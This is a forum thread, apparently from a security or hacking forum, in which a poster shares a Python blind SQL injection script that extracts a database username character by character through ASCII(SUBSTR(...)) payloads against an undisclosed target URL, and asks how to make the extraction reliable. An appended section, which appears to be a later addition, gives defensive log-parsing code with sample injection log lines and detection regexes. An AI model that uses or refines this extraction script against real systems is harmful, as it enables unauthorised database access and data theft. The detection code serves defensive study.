Inconsistent SQL Injection Results with Manual Python Script and Tools

Thread starter: NIGHTMARE GAMING

NIGHTMARE GAMING

Guest
I am trying to manually extract the current database user from a target URL using a Python script that infers the characters of the username one by one. However, the results are inconsistent, and tools like Ghauri and SQLmap give different results.

Here is the Python script I am using:

Code:
import requests

base_url = "can't give you for security purpose"

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
}

def check_character(position, ascii_value):
    payload = f'" AND ASCII(SUBSTR((SELECT USER FROM DUAL),{position},1))={ascii_value}-- wXyW'
    url = base_url + payload
    response = requests.get(url, headers=headers)
    return response.elapsed.total_seconds() > 1  # Adjust threshold as needed

def extract_user():
    user = ""
    for i in range(1, 21):  # Adjust range based on expected user length
        found_char = False
        for ascii_value in range(32, 127):  # ASCII printable characters
            if check_character(i, ascii_value):
                user += chr(ascii_value)
                found_char = True
                print(f"Found character: {chr(ascii_value)} at position {i}")
                break
        if not found_char:
            user += '?'
            print(f"No valid character found at position {i}, appending '?'")
    return user

current_user = extract_user()
print(f"Current user: {current_user}")

When I run this script, I get results like: Current user: +NPV$g(M}(+$m!D.

Also, Ghauri and SQLmap sometimes report different back-end DBMS types (Oracle, MySQL, etc.), and when I test the payload directly in the browser, it doesn't seem to trigger any changes.

What might be causing these inconsistent results, and how can I reliably extract the current database user using SQL injection?

Any help or insights would be greatly appreciated!
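From the defender's side, the request stream a script like the one above produces is easy to spot in web server logs. The following is an added example (not from the original post, Ghauri or SQLmap) that parses constructed access-log lines and flags a client that repeats the same ASCII(SUBSTR(...)) template while only its numeric literals change; the log lines, IP addresses, path and the detection thresholds are all constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post): one client
# sends three consecutive probes of the kind the script above issues, varying
# only the compared ASCII value; a second client sends a benign request.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2024:12:00:01 +0000] "GET /item?id=5%22%20AND%20ASCII(SUBSTR((SELECT%20USER%20FROM%20DUAL),1,1))=65--%20wXyW HTTP/1.1" 200 512
203.0.113.7 - - [10/Jun/2024:12:00:02 +0000] "GET /item?id=5%22%20AND%20ASCII(SUBSTR((SELECT%20USER%20FROM%20DUAL),1,1))=66--%20wXyW HTTP/1.1" 200 512
203.0.113.7 - - [10/Jun/2024:12:00:03 +0000] "GET /item?id=5%22%20AND%20ASCII(SUBSTR((SELECT%20USER%20FROM%20DUAL),1,1))=67--%20wXyW HTTP/1.1" 200 512
198.51.100.9 - - [10/Jun/2024:12:00:04 +0000] "GET /item?id=5 HTTP/1.1" 200 512
"""

# Common log format; the request target is one token because the client
# URL-encodes the payload (spaces become %20).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures of the character-at-a-time extraction family seen in the post:
# an ASCII(SUBSTR(...)) comparison, a SELECT from DUAL, a trailing comment.
SIGNATURES = [
    re.compile(r"ASCII\s*\(\s*SUBSTR", re.I),
    re.compile(r"SELECT\s+USER\s+FROM\s+DUAL", re.I),
    re.compile(r"--\s*\S*\s*$"),
]

def parse_line(line):
    """Split one log line into ip, path and the decoded query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    return {"ip": m["ip"], "path": path, "query": unquote_plus(query)}

def is_probe(query):
    # Two or more signatures in a single query string is treated as a probe.
    return sum(1 for s in SIGNATURES if s.search(query)) >= 2

def detect(log_text, min_variants=3):
    """Return (probe records, enumerating clients). A client is flagged when it
    sends min_variants distinct probes differing only in numeric literals."""
    hits, variants = [], defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_probe(rec["query"]):
            hits.append(rec)
            template = re.sub(r"\d+", "N", rec["query"])  # normalise position/ASCII loop values
            variants[(rec["ip"], rec["path"], template)].add(rec["query"])
    enumerators = {k: len(v) for k, v in variants.items() if len(v) >= min_variants}
    return hits, enumerators
```

The per-template variant count is the useful alert signal: a single probe may be a scanner, but dozens of variants of one template from one client against one path is the enumeration loop itself.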